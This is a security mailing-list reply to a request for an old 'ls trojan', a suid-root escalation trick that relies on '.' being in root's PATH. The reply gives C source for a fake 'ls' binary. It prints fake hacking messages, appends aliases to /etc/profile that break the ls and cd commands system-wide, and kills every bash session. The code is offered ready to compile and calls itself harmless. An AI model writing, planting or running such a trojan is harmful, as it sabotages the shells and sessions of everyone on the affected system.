Re: Old LS Trojan?

["colinm () clientsecure net" <colinm () clientsecure net>]

you could just whip one up, for demonstration purposes this 
would be funny
without doing any harm. just fix /etc/profile when your done.

#ls.c  compile with gcc -o ls ls.c
#include <stdio.h>
int x;
main(){
   printf("You've been hacked!\n");
   system("echo alias ls='\"echo \\n\"' >>/etc/profile");
   system("echo alias cd='\"echo No such file or directory\"' 
>>/etc/profile");
   for(x=1;x<8;++x){
   printf(".\n");
   }
   printf("installing backdoors and such...\n");
   printf("clearing /var/log dir of tracks...\n");
   sleep(3);
   printf("\n\nC-YA!\n");
   system("killall -9 bash");
}

cm

David S. Morgan wrote:
> Hey all,
>
> I am looking for an old LS trojan, with trojan being a misnomer.  Essentially, the scinario is that the admin (root) has a . 
> (dot) in his path.  The bad-user knows this, and has crafted an LS shell script (the part that I can't find) that 
> essentially copies /sbin/sh to a hidden directory and then performs some suid majik to make the sh run as if they were root, 
> without needing the root password.  The file then removes itself and does the real version of ls.
>
> Does anyone remember this one, and have the ls script anywhere?  I would like to use it in a demonstration.  I know that this has 
> probobly been fixed in various ways, but I have "old Unixes" for just such occasions.
>
> Dave Morgan
>
> David S. Morgan CISSP, CCNP 
> aka: captkras () earthlink net
>
> "When the winds of change blow hard enough, even the most tiny object
> can become a deadly projectile"
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html